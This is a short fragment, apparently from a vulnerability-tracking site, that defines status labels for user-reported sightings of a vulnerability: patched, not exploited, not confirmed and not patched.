- Patched: The vulnerability was observed as successfully patched by the user who reported the sighting.
- Not exploited: The vulnerability was not observed as exploited by the user who reported the sighting.
- Not confirmed: The user expressed doubt about the validity of the vulnerability.
- Not patched: The vulnerability was not observed as successfully patched by the user who reported the sighting.
Loading…
Loading…